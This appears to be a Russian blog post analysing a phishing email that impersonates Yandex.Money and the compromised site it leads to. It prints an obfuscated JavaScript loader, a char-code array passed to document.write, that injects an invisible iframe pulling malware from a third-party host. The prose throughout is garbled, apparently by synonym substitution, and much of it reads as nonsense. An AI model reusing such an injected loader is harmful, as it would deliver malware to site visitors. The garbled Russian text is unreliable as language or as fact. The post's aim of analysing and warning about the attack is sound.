Снова фишинг с Яндекс.Деньги. Или нет?

опять-таки фишинг с Яндекс.Деньги. Или дудки? Уже иной девай мне на ящики приходят послания, якобы, от Яндекс.Деньги , с мольбой активировать мой портмоне, т.к. он был заблокирован. Собственно вот это письмо: Примечание: Оригинала у меня дудки, я ненужные послания автоматом удаляю ( Shift + Del ), столько что заголовки не взирал, а это его HTML-часть, кою мне пришлось сохранить, поскольку TheBat! столько и не смог показать его в нормальной кодировке. Я утилитарны не употребляю своим кошельком на Яндекс-е, почему, беспорочно сознаюсь, повелся на первое подобное извещение, однако работать ничего не стал, заблокировали давай и хрен с ним :-) Второе этакое же цидулка получил нынче на иной собственный ящик, и постановил посмотреть, кто же мне это отослал. Ссылка, якобы для активации кошелька, ведет на сайт www.contidoo.com. Ради интереса, я переступил по показанной ссылке (http://www.contidoo.com/money.ya.ru/Index.html), однако к сожалению, показанная страница была выслана, либо вообще ввек не имелась :-) Я пошел на центральную страницу сайта, и мой файрвол залпом же стал "кричать", что некий процесс IZFP.EXE Я посмотрел отправной HTML центральной страницы www.contidoo.com и усмотрел там вот такой JavaScript Поскольку блокирование процесса ни к чему важному не повергло, я нашел этот процесс в ProcessExplorer Что прикасается JavaScript -а, то маленько модифицировав код: document.write( (60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46, 118,97,108,97,114,111,109,97,46,111,114,103,47,102,111,114,117,109,47,105,109,97,103,101, 115,47,97,118,97,116,97,114,115,47,103,97,108,108,101,114,121,47,105,99,101,47,105,99,101,47, 105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103, 104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62)); String.fromCharCode( code ) - функция переводит символ из его кода в его понятие. Если сейчас все это девало просмотреть чрез функцию String.fromCharCode() , то будет заметно, что это HTML-код размещения фрейма: Т.е. получается, что пользователь заходит на сайт, и JavaScript «рисует» на странице невидимый фрейм, какой в свою очередность загружает вирус. разумеется, все это девало можно было промониторить еще на стадии загрузки, однако мне было как-то ленность это работать, безусловно и браузер неподходящий был, взирал под IE 6.0 . Мой заинтересованность меня сгубит :) Пошел я на , моему взору предстала вот таковая картинка: Ничего увлекательного, обыкновенный сайт. Проверил домен в NIC.RU , относится он некому Georgi Iliev , город указан Burgas – это в Болгарии, сайт видаемо тоже располагает болгарскую локализацию, алкая в лингвистических делах я не особо глубок. Собственно я мню, сайт Валарома.Орг тут вообще не причем и на его месте мог угодить любой иной, скорей итого какой-то злокозненный пользователь нашел дырку в valaroma.org и воспользовался ей в своих мишенях, столько что после публикации этого обзора, я неизбежно дам на него ссылку админам валаромы. отдаленнее рыть я не стал, алкая в принципе ниточек еще бессчетно, однако мне как-то прискучило изводить на это период :) фортуны, и глядите, не попадите на увертки арапов ;-)